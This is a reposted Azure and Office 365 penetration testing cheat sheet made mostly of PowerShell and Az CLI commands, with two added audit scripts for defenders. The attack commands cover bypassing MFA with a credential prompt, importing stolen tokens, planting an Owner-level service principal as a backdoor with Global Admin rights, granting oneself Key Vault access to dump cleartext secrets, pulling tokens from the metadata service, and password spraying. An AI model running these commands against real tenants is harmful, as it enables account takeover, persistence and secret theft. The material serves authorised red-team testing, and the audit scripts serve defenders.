Azure Penetration Testing Cheat sheet

cheahengsoon

Eng Soon Cheah

Posted on February 5, 2021


Microsoft Azure & O365 CLI Tool Cheatsheet

By Beau Bullock (@dafthack)

Az PowerShell Module

Import-Module Az

Authentication

Connect-AzAccount

## Or this way sometimes gets around MFA restrictions

$credential = Get-Credential
Connect-AzAccount -Credential $credential

Import a context file

Import-AzContext -Profile 'C:\Temp\Live Tokens\StolenToken.json'

Export a context file

Save-AzContext -Path C:\Temp\AzureAccessToken.json

Account Information

List the current Azure contexts available

Get-AzContext -ListAvailable

Get context details

$context = Get-AzContext
$context.Name
$context.Account

List subscriptions

Get-AzSubscription

Choose a subscription

Select-AzSubscription -SubscriptionID "SubscriptionID"

Get the current user's role assignment

Get-AzRoleAssignment

List all resources and resource groups

Get-AzResource
Get-AzResourceGroup

List storage accounts

Get-AzStorageAccount

WebApps & SQL

List Azure web applications

Get-AzAdApplication
Get-AzWebApp

List SQL servers

Get-AzSQLServer

Individual databases can be listed using the server name and resource group returned by the previous command.

Get-AzSqlDatabase -ServerName $ServerName -ResourceGroupName $ResourceGroupName

List SQL Firewall rules

Get-AzSqlServerFirewallRule -ServerName $ServerName -ResourceGroupName $ResourceGroupName

List SQL Server AD Admins

Get-AzSqlServerActiveDirectoryAdministrator -ServerName $ServerName -ResourceGroupName $ResourceGroupName

Runbooks

List Azure Runbooks

Get-AzAutomationAccount
Get-AzAutomationRunbook -AutomationAccountName <AutomationAccountName> -ResourceGroupName <ResourceGroupName>

Export a runbook with:

Export-AzAutomationRunbook -AutomationAccountName $AccountName -ResourceGroupName $ResourceGroupName -Name $RunbookName -OutputFolder .\Desktop\

Virtual Machines

List VMs and get OS details

Get-AzVM
$vm = Get-AzVM -Name "VM Name"
$vm.OSProfile

Run commands on VMs

Invoke-AzVMRunCommand -ResourceGroupName $ResourceGroupName -VMName $VMName -CommandId RunPowerShellScript -ScriptPath ./powershell-script.ps1

Networking

List virtual networks

Get-AzVirtualNetwork

List public IP addresses assigned to virtual NICs

Get-AzPublicIpAddress

Get Azure ExpressRoute (VPN) Info

Get-AzExpressRouteCircuit

Backdoors

Create a new Azure service principal as a backdoor

$spn = New-AzAdServicePrincipal -DisplayName "WebService" -Role Owner
$spn
$BSTR = [System.Runtime.InteropServices.Marshal]::SecureStringToBSTR($spn.Secret)
$UnsecureSecret = [System.Runtime.InteropServices.Marshal]::PtrToStringAuto($BSTR)
$UnsecureSecret
$sp = Get-MsolServicePrincipal -AppPrincipalId <AppID>
$role = Get-MsolRole -RoleName "Company Administrator"
Add-MsolRoleMember -RoleObjectId $role.ObjectId -RoleMemberType ServicePrincipal -RoleMemberObjectId $sp.ObjectId
#Enter the AppID as username and what was returned for $UnsecureSecret as the password in the Get-Credential prompt
$cred = Get-Credential
Connect-AzAccount -Credential $cred -Tenant "<TenantID>" -ServicePrincipal
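The following is an added defender-side example, not part of Beau Bullock's cheat sheet: it audits the two places a service principal created as above would surface, Azure RBAC role assignments held by service principals and service-principal members of the "Company Administrator" (Global Administrator) directory role. It assumes Connect-AzAccount and Connect-MsolService have already been run, and assumes the Get-AzRoleAssignment ObjectType/RoleDefinitionName and Get-MsolRoleMember RoleMemberType property names.

```powershell
# Added audit example (not from the cheat sheet). Assumes an authenticated
# Az session (Connect-AzAccount) and MSOnline session (Connect-MsolService).
$privilegedRoles = @('Owner', 'Contributor', 'User Access Administrator')

# Azure RBAC side: role assignments in the current subscription whose principal
# is a service principal and whose role is one of the privileged ones above.
$spnAssignments = Get-AzRoleAssignment |
    Where-Object {
        $_.ObjectType -eq 'ServicePrincipal' -and
        $privilegedRoles -contains $_.RoleDefinitionName
    }

foreach ($assignment in $spnAssignments) {
    # Resolve the principal so the app ID can be matched against sign-in logs.
    $spn = Get-AzADServicePrincipal -ObjectId $assignment.ObjectId
    [PSCustomObject]@{
        DisplayName = $spn.DisplayName
        AppId       = $spn.AppId
        Role        = $assignment.RoleDefinitionName
        Scope       = $assignment.Scope
    }
}

# Directory side: service principals that are members of the Global Admin
# ("Company Administrator") role. A normal tenant should have very few or none.
$role = Get-MsolRole -RoleName 'Company Administrator'
Get-MsolRoleMember -RoleObjectId $role.ObjectId |
    Where-Object { $_.RoleMemberType -eq 'ServicePrincipal' } |
    Select-Object DisplayName, ObjectId, RoleMemberType
```

Any entry whose display name, app ID or scope is unfamiliar (such as a generic name like "WebService") is worth cross-checking against the audit log for who created the assignment and when.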

MSOnline PowerShell Module

Import-Module MSOnline

Authentication

Connect-MsolService

## Or this way sometimes gets around MFA restrictions

$credential = Get-Credential
Connect-MsolService -Credential $credential

Account and Directory Information

List Company Information

Get-MSolCompanyInformation

List all users

Get-MSolUser -All

List all groups

Get-MSolGroup -All

List members of a group (Global Admins in this case)

# Directory roles (such as Global Admins) are listed with Get-MsolRoleMember, not Get-MsolGroupMember
$role = Get-MsolRole -RoleName "Company Administrator"
Get-MsolRoleMember -RoleObjectId $role.ObjectId
# For an ordinary group, use its object ID instead
Get-MsolGroupMember -GroupObjectId $GUID

List all user attributes

Get-MsolUser -All | fl

List Service Principals

Get-MsolServicePrincipal

One-liner to search all Azure AD user attributes for passwords

$users = Get-MsolUser -All; foreach($user in $users){$props = @();$user | Get-Member -MemberType Property | foreach-object{$props+=$_.Name}; foreach($prop in $props){if($user.$prop -like "*password*"){Write-Output ("[*]" + $user.UserPrincipalName + "[" + $prop + "]" + " : " + $user.$prop)}}}

Az CLI Tool

Authentication

az login

Dump Azure Key Vaults

List out any key vault resources the current account can view

az keyvault list --query '[].name' --output tsv

With contributor level access you can give yourself the right permissions to obtain secrets.

az keyvault set-policy --name <KeyVaultname> --upn <YourContributorUsername> --secret-permissions get list --key-permissions get list --storage-permissions get list --certificate-permissions get list

Get URI for Key Vault

az keyvault secret list --vault-name <KeyVaultName> --query '[].id' --output tsv

Get cleartext secret from keyvault

az keyvault secret show --id <URI from last command> | ConvertFrom-Json
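As an added defender-side example (not from the cheat sheet), the script below lists every principal that a Key Vault access policy grants get or list on secrets, which is exactly what the set-policy step above creates. It assumes an authenticated Az session and assumes the PSKeyVault properties AccessPolicies, PermissionsToSecrets and EnableRbacAuthorization returned by Get-AzKeyVault.

```powershell
# Added audit example (not from the cheat sheet). Assumes Connect-AzAccount
# has been run and the Az.KeyVault module is loaded.
foreach ($vaultSummary in Get-AzKeyVault) {
    # Get-AzKeyVault without -VaultName returns summaries only; fetch the full
    # object to get the access policies.
    $vault = Get-AzKeyVault -VaultName $vaultSummary.VaultName

    if ($vault.EnableRbacAuthorization) {
        # Data-plane access is governed by Azure RBAC role assignments on the
        # vault, so access policies are not the place to look for this vault.
        Write-Output "[i] $($vault.VaultName): RBAC authorization enabled, review role assignments instead"
        continue
    }

    foreach ($policy in $vault.AccessPolicies) {
        $secretPerms = @($policy.PermissionsToSecrets)
        # Comparison is case-insensitive in PowerShell, so 'Get' matches 'get'.
        $canRead = ($secretPerms -contains 'get') -or
                   ($secretPerms -contains 'list') -or
                   ($secretPerms -contains 'all')
        if ($canRead) {
            [PSCustomObject]@{
                Vault       = $vault.VaultName
                Principal   = $policy.DisplayName
                ObjectId    = $policy.ObjectId
                SecretPerms = ($secretPerms -join ',')
            }
        }
    }
}
```

Compare the output against the list of principals expected to read secrets from each vault; a user account with Contributor on the resource group that now also holds secret get/list is the pattern the set-policy step produces.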

Metadata Service URL

http://169.254.169.254/metadata

Get access tokens from the metadata service

GET /metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/ HTTP/1.1
Host: 169.254.169.254
Metadata: true

Other Azure & O365 Tools

MicroBurst

Azure security assessment tool

https://github.com/NetSPI/MicroBurst

Look for open storage blobs

Invoke-EnumerateAzureBlobs -Base $BaseName

Export SSL/TLS certs

Get-AzPasswords -ExportCerts Y

Azure Container Registry dump

Get-AzPasswords
Get-AzACR

PowerZure

Azure security assessment tool

https://github.com/hausec/PowerZure

ROADTools

Framework to interact with Azure AD

https://github.com/dirkjanm/ROADtools

Stormspotter

Red team tool for graphing Azure and Azure AD objects

https://github.com/Azure/Stormspotter

MSOLSpray

Tool to password spray Azure/O365

https://github.com/dafthack

Import-Module .\MSOLSpray.ps1
Invoke-MSOLSpray -UserList .\userlist.txt -Password Spring2020